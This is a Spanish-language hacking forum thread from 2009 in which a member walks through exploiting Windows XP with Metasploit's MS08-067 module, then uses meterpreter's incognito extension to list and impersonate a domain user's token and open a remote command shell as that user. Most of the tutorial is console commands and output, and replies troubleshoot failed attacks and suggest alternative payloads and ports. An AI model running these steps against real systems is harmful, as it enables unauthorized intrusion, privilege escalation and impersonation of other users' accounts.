elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
27 Mayo 2012, 17:32  


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado (Moderadores: ANELKAOS, TRICKY)
| | |-+  [Metasploit] Suplantación de Usuarios		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Metasploit] Suplantación de Usuarios  (Leído 6,667 veces)
Shell Root


Desconectado Desconectado

Mensajes: 2.456


Alex Jurado


Ver Perfil WWW
[Metasploit] Suplantación de Usuarios
« en: 27 Diciembre 2009, 01:32 »
Suplantación de Usuarios
[Metasploit By: Shell Root]


Ahora veremos como suplantar a un usuario del sistema sin tener que crear un usuario nuevo con permisos de administrador.

Primero ingresaremos a la P.C con el exploit:
    * exploit/windows/smb/ms08_067_netapi

y con el PAYLOAD:
    * windows/vncinject/bind_tcp

En este caso usaremos el PAYLOAD windows/shell/bind_tcp. No explicaré mucho porque para eso esta este POST de mi amigo Rcart.
http://foro.portalhacker.net/index.php/topic,93233.0.html

Código:
               _                  _       _ _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |
                            |_|


       =[ metasploit v3.3.2-release [core:3.3 api:1.0]
+ -- --=[ 462 exploits - 219 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
       =[ svn r7808 updated 16 days hago (2009.12.10)

Warning: This copy of the Metasploit Framework was last updated 16 days hago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://dev.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.2:4661 -> 192.168.0.3:4444)

meterpreter >

Despues de obtener el Meterpreter, ejecutaremos el use más la opción de incognito
Código:
meterpreter > use incognito
Loading extension incognito...success.
meterpreter >

Miramos que opciones tiene:
Código:
meterpreter > help

Incognito Commands
==================

    Command              Description
    -------              -----------
    add_group_user       Attempt to add a user to a global group with all tokens
    add_localgroup_user  Attempt to add a user to a local group with all tokens
    add_user             Attempt to add a user with all tokens
    impersonate_token    Impersonate specified token
    list_tokens          List tokens available under current user context
    snarf_hashes         Snarf challenge/response hashes for every token

meterpreter >

Usaremos el comando list_tokens. Pero miremos que parametros tiene para la ejecución:
Código:
meterpreter > list_tokens
Usage: list_tokens <list_order_option>

Lists all accessible tokens and their privilege level

OPTIONS:

    -g        List tokens by unique groupname
    -u        List tokens by unique username


meterpreter >

Ahora mostraremos los usuarios existentes en el Sistema:
Código:
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
COLTEJER\ServerColtejer
NT AUTHORITY\Servicio de red
NT AUTHORITY\SERVICIO LOCAL
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

meterpreter >

Ahora llega el momento en el que vamos a suplantar un usuario.
Código:
meterpreter > impersonate_token COLTEJER\\ServerColtejer
[+] Delegation token available
[+] Successfully impersonated user COLTEJER\ServerColtejer
meterpreter >

Abrimos la consola o shell remota del usuario suplantado. En este caso del usuario COLTEJER\ServerColtejer
Código:
meterpreter > execute -f cmd.exe -i -t
Process 1528 created.
Channel 1 created.
Microsoft Windows XP [Versi¢n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

By: Shell Root
Fuente: http://shellrootsecurity.blogspot.com/2009/12/suplantacion-de-usuarios.html
Video: http://www.youtube.com/watch?v=NHZlxMyim9s
« Última modificación: 28 Diciembre 2009, 19:08 por alex19910218 » En línea
---
shakuako

Desconectado Desconectado

Mensajes: 23


Ver Perfil
Re: [Metasploit] Suplantación de Usuarios
« Respuesta #1 en: 27 Diciembre 2009, 06:14 »
Hola qe tal amigo muchas gracias por compartir el conocimiento pero tnego una duda a mi no me funciona el msf actualizado y mira lo qe me sale

root@sheldon-desktop:/pentest/exploits/framework3# ./msfconsole

#    # ###### #####   ##    ####  #####  #       ####  # #####
##  ## #        #    #  #  #      #    # #      #    # #   #
# ## # #####    #   #    #  ####  #    # #      #    # #   #
#    # #        #   ######      # #####  #      #    # #   #
#    # #        #   #    # #    # #      #      #    # #   #
#    # ######   #   #    #  ####  #      ######  ####  #   #


       =[ metasploit v3.3.3-dev [core:3.3 api:1.0]
+ -- --=[ 480 exploits - 220 auxiliary
+ -- --=[ 253 payloads - 22 encoders - 8 nops
       =[ svn r7913 updated 8 days ago (2009.12.18)

Warning: This copy of the Metasploit Framework was last updated 8 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://dev.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

  • Started bind handler
    • [-] Exploit failed: The connection timed out (192.168.1.100:445).
  • Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >             

ºººººººº Que modificaicones tengo qe hacer para qe fucione?? de antemano gracias gracias
En línea
Martin-Ph03n1X


Desconectado Desconectado

Mensajes: 955


SHOCYRIX


Ver Perfil
Re: [Metasploit] Suplantación de Usuarios
« Respuesta #2 en: 27 Diciembre 2009, 07:14 »
muchas gracias pero cual es el mas nuevo metaxplit de windows xD?
En línea
  No eres tu trabajo, no eres cuanto tienes en el banco, no eres el auto que conduces, ni el contenido en tu billetera, no eres tus malditos cakis, eres el bailarin cantante del mundo...!!!"
kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.210


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: [Metasploit] Suplantación de Usuarios
« Respuesta #3 en: 27 Diciembre 2009, 13:28 »
@ shakuako: normal que no te funcione cuando no seteas todos los parámetros, usar el buscador porque hay manuales a puntapala explicando el uso básico de metasploit!!!

@Martin-Ph03n1X:  es tan dificil buscarlo tu mismo??

buen manual, gracias por el aporte
En línea
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
Shell Root


Desconectado Desconectado

Mensajes: 2.456


Alex Jurado


Ver Perfil WWW
Re: [Metasploit] Suplantación de Usuarios
« Respuesta #4 en: 28 Diciembre 2009, 02:10 »
Cita de: shakuako en 27 Diciembre 2009, 06:14
Hola qe tal amigo muchas gracias por compartir el conocimiento pero tnego una duda a mi no me funciona el msf actualizado y mira lo qe me sale

root@sheldon-desktop:/pentest/exploits/framework3# ./msfconsole

#    # ###### #####   ##    ####  #####  #       ####  # #####
##  ## #        #    #  #  #      #    # #      #    # #   #
# ## # #####    #   #    #  ####  #    # #      #    # #   #
#    # #        #   ######      # #####  #      #    # #   #
#    # #        #   #    # #    # #      #      #    # #   #
#    # ######   #   #    #  ####  #      ######  ####  #   #


       =[ metasploit v3.3.3-dev [core:3.3 api:1.0]
+ -- --=[ 480 exploits - 220 auxiliary
+ -- --=[ 253 payloads - 22 encoders - 8 nops
       =[ svn r7913 updated 8 days hago (2009.12.18)

Warning: This copy of the Metasploit Framework was last updated 8 days hago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://dev.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

  • Started bind handler
    • [-] Exploit failed: The connection timed out (192.168.1.100:445).
  • Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >             

ºººººººº Que modificaicones tengo qe hacer para qe fucione?? de antemano gracias gracias

A ver, pues primero que todo tienes que verificar si la PC a que quieres explotar esta dentro de tú misma Red LAN. Otra cosa que es muy importanté, es saber si el exploit que estamos usando la podemos ejecutar contrá la maquina atacante. Pasalé el Scanner Nessus para ver si es vulnerable a ese exploit.

Algo así:


Saludos!
En línea
---
Shell Root


Desconectado Desconectado

Mensajes: 2.456


Alex Jurado


Ver Perfil WWW
Re: [Metasploit] Suplantación de Usuarios
« Respuesta #5 en: 28 Diciembre 2009, 02:12 »
Cita de: Martin-Ph03n1X en 27 Diciembre 2009, 07:14
muchas gracias pero cual es el mas nuevo metaxplit de windows xD?

La versión más reciente es la Metasploit Framework 3.3.3
Download: http://www.metasploit.com/releases/framework-3.3.3.exe

Saludos!
En línea
---
illera88


Desconectado Desconectado

Mensajes: 403


Ver Perfil
Re: [Metasploit] Suplantación de Usuarios
« Respuesta #6 en: 16 Enero 2010, 11:50 »
Yo lo he intentado y todo perfecto pero no abre la sesion:
Citar
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.140
RHOST => 192.168.1.140
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

  • Started bind handler
  • Automatically detecting the target...
  • Fingerprint: Windows XP Service Pack 3 - lang:Spanish
  • Selected Target: Windows XP SP3 Spanish (NX)
  • Triggering the vulnerability...
  • Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) > exploit

Por que es esto?
Un saudo
En línea
Debci
Wiki

Desconectado Desconectado

Mensajes: 1.945


Actualizate o muere!


Ver Perfil WWW
Re: [Metasploit] Suplantación de Usuarios
« Respuesta #7 en: 16 Enero 2010, 11:54 »
Cita de: illera88 en 16 Enero 2010, 11:50
Yo lo he intentado y todo perfecto pero no abre la sesion:
Citar
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.140
RHOST => 192.168.1.140
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

  • Started bind handler
  • Automatically detecting the target...
  • Fingerprint: Windows XP Service Pack 3 - lang:Spanish
  • Selected Target: Windows XP SP3 Spanish (NX)
  • Triggering the vulnerability...
  • Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) > exploit

Por que es esto?
Un saudo
Me temo que las sp3 no son vulnerables al netapi.

Saludos
En línea


Juega a este pedazo de MMORPG y consigue premios registrandote como referido mio! League of Legends
Shell Root


Desconectado Desconectado

Mensajes: 2.456


Alex Jurado


Ver Perfil WWW
Re: [Metasploit] Suplantación de Usuarios
« Respuesta #8 en: 16 Enero 2010, 15:42 »
illera88, intentad hacedlo con el PAYLOAD windows/meterpreter/reverse_tcp.
Además recordad que el sistema debe ser vulnerable!.

..::| D3Bć1 |::. Mirad los TARGET's
En línea
---
seupcdm

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: [Metasploit] Suplantación de Usuarios
« Respuesta #9 en: 16 Enero 2010, 16:59 »
Cita de: Shell Root en 16 Enero 2010, 15:42
illera88, intentad hacedlo con el PAYLOAD windows/meterpreter/reverse_tcp.
Que cambies del payload de una shell inversa a el payload de alojar una shell no tiene nada que ver.
En línea
K2USTY

Desconectado Desconectado

Mensajes: 8



Ver Perfil
Re: [Metasploit] Suplantación de Usuarios
« Respuesta #10 en: 19 Enero 2010, 00:47 »
Que tal, alguien esta al tanto de algún exploit para SP3 que no sea netapi
En línea
El peor enemigo de la seguridad de una empresa son sus propios empleados.
rockernault


Desconectado Desconectado

Mensajes: 2.045


Linux User!!!


Ver Perfil
Re: [Metasploit] Suplantación de Usuarios
« Respuesta #11 en: 19 Enero 2010, 01:57 »
les compartire un secreto personal..

dirijan el ataque al puerto 139....!!!


es tambien vulnerable, no es necesario el ataque al 445...


prueben y comenten
En línea



Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
EE.UU. condenará con cárcel la suplantación de ‘login’
Noticias 		wolfbcn 1 544 Último mensaje 8 Junio 2011, 19:10
por chillinfart
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines